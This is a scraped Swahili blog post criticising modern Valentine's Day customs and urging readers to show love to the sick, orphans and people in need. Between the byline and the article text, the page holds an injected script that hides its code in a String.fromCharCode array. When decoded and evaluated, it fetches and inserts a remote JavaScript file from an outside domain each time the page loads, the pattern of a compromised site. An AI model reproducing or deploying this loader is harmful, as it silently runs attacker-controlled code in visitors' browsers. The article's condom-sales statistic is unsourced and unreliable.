Recent Comments

Ukifanya Hivi Bado Hujaenjoy Valentine’s Day

By ventas malack Feb 10, 2022
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Valentine’s Day ni sherehe ya kudumisha upendo kama inafahamika kwa wengi wetu ambapo asili ya sherehe hii ni Roma. Sherehe hii ilianza kuazimishwa baada ya moja ya viongozi wa dini ya kikatoliki aitwaye Valentine alipowatetea wanajeshi wa kirumi kuruhusiwa kuoa.
Kiukweli tafsiri ya Valentine’s day ni tofauti sana na chanzo chake watu huiita ni siku ya wapendanao na kuitumia kama nafasi kwa wapenzi kuoneshana upendo wao. Lakini wengi wao huifanya kama ndiyo siku ya mapenzi duniani, mara ooh kuanzisha mapenzi, huku na kule kupasha viporo,uasherati,uzinzi na mengineyo.
Kiuhalisihia mimi naita Valentine’s Day ya siku hizi ni ulimbukeni na anasa tu kutokana na matukio yanayojiri siku hiyo. Inashangaza kwelii kwa kuwa siku ya Valentine watu wengi huona ndiyo siku ambayo ni sahihi kwa kufanya ngono kufanya anasa na uchafu wote kisa tu ni siku ya wapendanao kama wanavoiita na kuondosha tafsiri halisi ya upendo ilivyo.
Shirika la Afya la marekani linaeleza kuwa asilimi 35 ya mauzo ya kondomu kwa mwaka huwa ni mwezi wa pili na huku zaidi ya Asilimia 75 huuzwa siku ya Valentine, hii si takwimu ndogo ya ngono hivyo watu wengi huifanya haya maadhimisho ni kama siku ya ngono duniani.
Kiuhalisia Siku hii haitakiwi kwenda hivyo mana hata wanaoonesha upendo hufanya siku hiyo pekee ni siku ya kuuonesha upendo wakati upendo unatakiwa uwepo baina yetu kila siku kila muda kusubiri Valentine’s day si sahihi ni kama Upendo wa matukio tu.
Wapo wanaotoa sana zawadi siku hii wakiamini vitu vya thamani ndiyo upendo lakini kiuhalisia upendo si vitu ni hisia ya amani, kujaliwa na kulindwa bila kusahau kuheshimiwa Hivyo basi watoa zawadi wawe na upendo kabla ya hivi vitu. Siku moja Dokta Mwaka Alisikika akisema nikikupa iPhone siyo kukupenda mana nna uwezo wa kuzinunua mia upend ni kujali tu.
Ni vyema kuazimisha siku hii kwa kuwajalina kuwaonesha upendo watu waliokosa nafasi hiyo ikiwemo wagonjwa, watoto wa mtaani, yatima, wajane, wafungwa na watu wengine wenye uhitaji utakuwa umetambua thamani halisi ya upendo na tafsiri ya Valentine’s Day. Kiukweli Ukifanya Hivi Hujaielewa Valentine’s Day.

By ventas malack

Make the World Aware